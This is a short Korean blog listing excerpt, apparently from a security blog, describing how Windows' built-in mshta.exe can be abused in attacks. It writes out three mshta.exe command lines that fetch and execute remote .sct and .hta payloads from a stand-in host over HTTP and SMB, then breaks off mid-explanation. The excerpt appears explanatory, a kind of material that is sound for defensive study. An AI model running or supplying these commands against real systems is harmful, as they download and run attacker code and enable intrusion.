728x90 랜섬웨어1 시스템 보안 - 윈도우 MSHTA(Microsoft HTML Application) 공격 command-line mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")")) mshta.exe http://127.0.0.1:4444/payload.hta mshta.exe \\127.0.0.1\folder\payload.hta payload.hta (SCT payloads) 결과 HTA(HTML Application) 보는 것처럼 윈도우에 기본적으로 설치된 mshta.exe(Microsoft HTML Application)는 마치 웹 브라우저처럼 외부에 있는 웹 페이지를 요청하는 기능을 가지고 있다. 여기서 문제점은 여기에 내장된 브라우저가 인터넷 익스플로러 기반인지 ActiveXObject.. 2023. 2. 7. 이전 1 다음 728x90
HackLog
